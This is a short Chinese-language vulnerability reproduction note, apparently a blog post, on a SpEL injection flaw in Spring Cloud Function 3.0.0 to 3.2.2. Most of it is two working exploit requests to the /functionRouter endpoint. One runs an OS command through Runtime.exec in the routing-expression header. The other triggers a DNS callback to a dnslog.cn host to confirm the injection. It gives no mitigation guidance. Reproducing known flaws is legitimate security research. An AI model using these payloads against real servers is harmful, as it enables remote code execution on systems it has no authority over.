简介

Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。

影响版本

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

复现

1
2
3
4
5
6
7
8
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
Content-Length: 5

123

image-20220403232403602

1
2
3
4
5
6
7
8
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("81731h.dnslog.cn")
Content-Length: 3

123

image-20220403232423476

参考

https://github.com/hktalent/spring-spel-0day-poc